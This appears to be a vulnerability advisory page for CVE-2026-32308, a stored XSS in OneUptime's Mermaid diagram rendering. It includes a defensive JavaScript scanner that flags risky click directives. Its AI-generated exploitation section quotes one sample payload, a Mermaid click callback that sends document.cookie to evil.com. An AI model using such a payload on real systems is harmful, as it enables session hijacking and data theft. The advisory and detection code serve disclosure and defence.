VYPR
High severity · NVD Advisory · Published Mar 12, 2026 · Updated Mar 14, 2026

OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")

CVE-2026-32308

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

OneUptime prior to 10.0.23 has a stored XSS vulnerability via Mermaid diagrams rendered with securityLevel 'loose' and innerHTML injection, allowing arbitrary JavaScript execution.

Vulnerability

Overview

OneUptime, an open-source monitoring and observability platform, contains a stored cross-site scripting (XSS) vulnerability in its Markdown viewer component. The issue arises because the Mermaid diagram renderer is initialized with securityLevel: "loose" and the resulting SVG is injected into the DOM via innerHTML [1][3]. This configuration explicitly permits interactive event bindings, contrary to the safe default "strict" which strips all interactivity.

Exploitation

Details

An authenticated attacker can exploit this by crafting a Mermaid diagram that uses the click directive to execute arbitrary JavaScript. For example, a payload like click A callback "javascript:fetch('https://evil.com/?c='+document.cookie)" will be processed by Mermaid and embedded as an event handler in the SVG [3]. Any field that renders Markdown—such as incident descriptions, status page announcements, or monitor notes—is a potential attack vector. The attacker only needs the ability to create or edit content that is later displayed to other users.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of any user who views the malicious diagram. This can lead to session hijacking, data exfiltration, or further compromise of the OneUptime instance. Since the XSS is stored, it affects all subsequent viewers, including administrators, amplifying the potential damage.

Mitigation

The vulnerability is fixed in OneUptime version 10.0.23 [4]. Users should upgrade immediately. The fix likely involves setting securityLevel to "strict" and avoiding raw innerHTML injection. No workarounds are documented, but restricting Markdown input to trusted users may reduce risk until patching is complete.
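The two renderer settings discussed above, beside a store-side check that flags Mermaid click directives before the diagram reaches the renderer, as an added example that is not OneUptime's code: the config objects, the extractMermaidBlocks and findRiskyMermaidDirectives helpers and the sample Markdown are this example's own constructions, and the check complements rather than replaces setting securityLevel to "strict".

```javascript
// Added example (not OneUptime's code). Two defensive layers for Markdown that
// embeds Mermaid diagrams:
//   1. the renderer config: the weak "loose" setting from the advisory beside
//      Mermaid's "strict" default, which strips click/callback interactivity;
//   2. a scan of stored Markdown that flags `click` directives carrying a
//      callback or a javascript: target, so such content can be rejected or
//      reviewed before it is rendered for other users.

// Weak configuration as described in the advisory: interactive bindings allowed.
const MERMAID_CONFIG_VULNERABLE = { startOnLoad: false, securityLevel: "loose" };
// Hardened configuration: "strict" is Mermaid's default and drops event bindings.
const MERMAID_CONFIG_HARDENED = { startOnLoad: false, securityLevel: "strict" };

// Pull the body of every ```mermaid fenced block out of a Markdown string.
function extractMermaidBlocks(markdown) {
  const blocks = [];
  const fence = /```mermaid[^\n]*\n([\s\S]*?)```/g;
  let m;
  while ((m = fence.exec(markdown)) !== null) blocks.push(m[1]);
  return blocks;
}

// Report click directives that would become event handlers or javascript: links.
// Returns one finding per offending line: { block, line, reason }.
function findRiskyMermaidDirectives(markdown) {
  const findings = [];
  extractMermaidBlocks(markdown).forEach((block, blockIndex) => {
    block.split("\n").forEach((rawLine) => {
      const line = rawLine.trim();
      if (!/^click\s+/i.test(line)) return; // only `click <node> ...` lines matter
      let reason = null;
      if (/\bcall(back)?\b/i.test(line)) reason = "callback binding";
      else if (/javascript\s*:/i.test(line)) reason = "javascript: target";
      if (reason) findings.push({ block: blockIndex, line, reason });
    });
  });
  return findings;
}

// Constructed sample: an incident description with one harmless link diagram
// and one diagram using the callback form the advisory describes (placeholder body).
const SAMPLE_MARKDOWN = [
  "Incident timeline:",
  "```mermaid",
  "graph TD",
  "  A[DB] --> B[API]",
  "  click A \"https://status.example.test/db\" \"docs\"",
  "```",
  "```mermaid",
  "graph TD",
  "  X --> Y",
  "  click X callback \"javascript:void(0)\"",
  "```",
].join("\n");
```

Run findRiskyMermaidDirectives over each Markdown field on save; a non-empty result identifies content that "loose" rendering would turn into an executable handler.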

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package            Affected versions   Patched versions
oneuptime (npm)    < 10.0.23           10.0.23
